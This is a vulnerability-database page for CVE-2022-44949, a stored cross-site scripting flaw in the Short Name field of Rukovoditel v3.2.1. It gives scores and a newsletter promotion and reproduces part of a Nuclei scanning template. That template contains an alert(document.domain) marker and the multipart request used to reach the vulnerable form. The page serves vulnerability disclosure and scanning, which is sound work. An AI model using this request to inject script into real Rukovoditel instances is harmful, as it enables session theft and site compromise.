CVE-2022-44949
published 2022-12-02CVE-2022-44949: Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at…
PriorityP428medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
0.94%
56.5th percentile
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rukovoditel | rukovoditel | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Rukovoditel <= 3.2.1 - Cross Site Scripting
nuclei·CVSS 5.4
CVE-2022-44949 [MEDIUM] Rukovoditel <= 3.2.1 - Cross Site Scripting
Rukovoditel alert(document.domain)
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
No writeups or analysis indexed.
2022-12-02
Published